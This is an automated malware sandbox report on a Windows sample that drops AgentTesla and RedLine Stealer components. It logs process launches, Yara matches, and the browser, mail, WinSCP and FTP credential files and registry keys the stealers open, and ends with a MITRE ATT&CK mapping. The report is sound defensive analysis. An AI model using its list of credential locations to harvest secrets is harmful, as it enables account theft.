Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD8B.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

Code function: 5_2_03178550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,

5_2_03178550

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: GetLocaleInfoEx,		0_2_00007FF6C7588FB0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: GetLocaleInfoEx,		0_2_00007FF6C7589080

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\alg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

Code function: 0_2_00007FF6C755B27C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6C755B27C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

5_2_03178550

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 5.2.jsc.exe.3879580.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.neworigin.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.jsc.exe.3879580.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3160951501.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1890742051.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3160951501.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jsc.exe PID: 5100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 5.2.jsc.exe.3879580.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.jsc.exe.38b6790.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.build.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.jsc.exe.38b6790.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.1892134419.0000000000C82000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jsc.exe PID: 5100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 5.2.jsc.exe.3879580.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.neworigin.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.jsc.exe.3879580.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3160951501.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1890742051.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jsc.exe PID: 5100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 5.2.jsc.exe.3879580.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.neworigin.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.jsc.exe.3879580.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3160951501.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1890742051.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3160951501.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jsc.exe PID: 5100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 5.2.jsc.exe.3879580.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.jsc.exe.38b6790.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.build.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.jsc.exe.38b6790.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.1892134419.0000000000C82000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jsc.exe PID: 5100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	2 LSASS Driver	1 Abuse Elevation Control Mechanism	111 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	21 Native API	1 DLL Side-Loading	2 LSASS Driver	1 Deobfuscate/Decode Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Access Token Manipulation	4 Obfuscated Files or Information	NTDS	36 System Information Discovery	Distributed Component Object Model	111 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	2 Registry Run Keys / Startup Folder	1 Windows Service	1 Direct Volume Access	LSA Secrets	1 Query Registry	SSH	1 Clipboard Data	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
